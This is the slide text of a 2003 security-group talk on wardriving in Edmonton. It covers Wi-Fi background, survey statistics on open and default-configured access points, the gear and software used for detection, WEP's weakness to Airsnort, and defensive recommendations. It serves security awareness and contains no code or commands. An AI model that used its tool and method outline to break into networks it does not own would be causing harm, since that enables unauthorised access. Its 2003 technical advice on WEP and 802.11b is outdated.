CIPS CompSEC SIG

1
CIPS CompSEC SIG

• Feb 20, 2003
• Speech by Renderman
• Render_at_renderlab.net

2
Wardriving Edmonton Results

• Its not a bug, its a feature

3
Technology Background

• 802.11b
• Spread Spectrum
• 2.4Ghz License free
• 11 channels, 2.412 2.462 GHz
• 11Mbps
• 40, 64, 128 bit WEP Encryption, MAC filtering
• SSID logical network name
• Cellular nature
• Wi-Fi Alliance
• Founded 1999, Certifies devices for compliance

4
Technology Background

• Various features among different models
• Usually have DHCP server, MAC filtering, WEP
• Wi-Fi is designed to roam to strongest signal
• Many different manufacturers and many brands
• Dlink
• Linksys
• Cisco
• Apple
• M

5
Which brings us to today..

• 802.11b is a multi billion Dollar industry
• 1.546 Billion in 2002
• Set to rise (or fall, depending on the report)
• Prices falling dramatically
• Many laptops/PDAs Wi-Fi enabled from the factory
• Airports, Airplanes, Cafés, Hotels
• Very pervasive, very chic, hot technology

6
Enough marketing and history

• Time for the realities

7
What is Wardriving

• WarDriving v. The benign act of locating and
  logging wireless access points while in motion. -
  Blackwave
• A.k.a, Network stumbling, lanjacking(?),
  whacking(?)
• Using a Wi-Fi enabled device (laptop, PDA), to
  discover the presence of wireless networks.
• Factory software allows rudimentary stumbling
• First coined and automated by Pete Shipley of
  Dis.org
• Completely LEGAL!
• Frighteningly effective

8
Wardriving is not a crime

• Detection is legal public frequencies
• Connecting is illegal
• Stumbler Ethic
• Trying to raise security awareness with the
  Worldwide Wardrive
• Bad people do bad thing, Wardrivers are not bad
  people

9
Edmonton, Alberta as of Feb 2nd 2003, 1689 Access
points
10
Downtown and University Detail
11
Downtown Detail
12
Edmonton Statistics

• Since March 2002
• 1689 separate Access points detected
• 1194 without WEP (not necessarily insecure)
• 600 on default settings (very insecure)
• In the strangest of places
• Hospitals, health facilities, govt, hotels,
  trucking companies, breweries, homes, oil
  companies, schools, cafes.

13
Wireless Intruder Implications

• Bandwidth theft
• Spamming, threats, attacks
• All tracks lead back to you
• Access to your internal network
• Untraceable
• Easy to do, cheap

14
Edmonton Survey Conclusions

• After 11 months and a lot of miles, no one has
  learned anything
• No-one is paying attention
• Wireless is popular even in the frozen north
• It cant happen here attitude
• Severe lack of understanding
• There is an interest in learning though

15
Now that I have your attention

• How is this accomplished?

16
Wardriving made easy

• Laptop or PDA
• 802.11b card
• Special software that supports the card
  (Netstumbler or Kismet)
• Some form of conveyance (feet, bike, car, etc)
• Optional
• External antennas (Pringles can)
• GPS for generating maps
• Misc software (realtime tracking, routing)

17
Passive Vs Active

• Netstumbler Active, Listens for Broadcast
  announcements 10 per second)
• Kismet Passive, Listens for any 802.11b traffic
  and determines network settings from packet
  capture. Able to detect cloaked APs (SSID
  broadcast turned off)
• Both Free (as in beer)
• Both useful as site survey tools, used throughout
  the industry

18
The RenderVan Wardriving Rig
19
The problems with Wi-Fi

• No one RTFMs
• APs left on defaults
• WEP unsafe at any key length
• Inappropriate deployment
• Rougue APs
• Its a bloomin RADIO!

20
RTFM

• Buried security warnings and instructions
• No deployment warnings
• Manufacturers ignoring problem, bad for sales

21
Defaults

• 36 of APs in Edmonton on Default, out of box
  settings
• It works, dont screw with it attitude
• Quick start Guides ignore security

22
Demo

• Default access point

23
Wired equivalency protocol

• Uses RC4
• Export restrictions kept key at 40bit, very weak
  64bit later on
• Proprietary extensions for 128bit, incompatible
  between manufacturers, making for headaches and
  users ignoring it
• Static Key
• Found weak in July 2001
• Fluhrer, Mantin, and Shamir (S in RSA) Broke
  RC4 in August 2001 which lead to
• Airsnort 30 seconds 2 gig of data WEP Key

24
Deployment problems

• Often behind firewalls and other security devices
  on the Trusted side of the network
• Should be treated as a wall jack Would you run
  cat5 to the parking lot?
• Current implementation makes security hard to
  maintain (rotating keys, updating MAC filters)
• Attitudes No one would want to break in here,
  No one will find me, Security costs too much

25
Rogue APs

• Employees being helpful, or creative
• IT staff unaware, not caring
• No company policies, or no enforcment
• No IT auditing rouge hunting
• Often on defaults (ID10T errors)
• Geewhiz factor for the boss

26
Its a RADIO!!!

• Broadcasts far beyond walls and property
• If WEP not enabled, data is sent in the clear
• Email, database queries, FTP, messenger
• Data sent in all directions
• Long distance detection lt25 miles
• Long distance connection lt5miles
• All Wi-Fi gear is a Tx Rx
• Wi-Fi is cellular in nature, designed to
  associate with the strongest signal (even if its
  not yours)

27
Suggestions

• Set a company policy on Wireless and enforce it
• Use WEP at a minimum Keep out sign
• EAP (Extensible Authentication Protocol), Cisco
• RADIUS, 802.1x, VPNs
• Audit network from wired side
• Audit network from wireless side
• Locate APs in front of firewall, captive portal
  or other authentication (RADIUS, etc)
• Hire professionals for installation and advice

28
Sites

• www.renderlab.net - Edmonton and Alberta
  wardriving
• www.dis.org/wl/maps/ - Pete shipleys original
  research
• www.netstumbler.com - Active wardriving software
• www.kismetwireless.net - Passive wardriving
  software
• www.wardrivingisnotacrime.com - Fashions by
  Blackwave
• www.worldwidewardrive.org - We have our own event
• www.wardriving.com - General resource
• forums.netstumbler.com My hangout, great info
  ppl

29
Q A

• Questions, comments, and accusations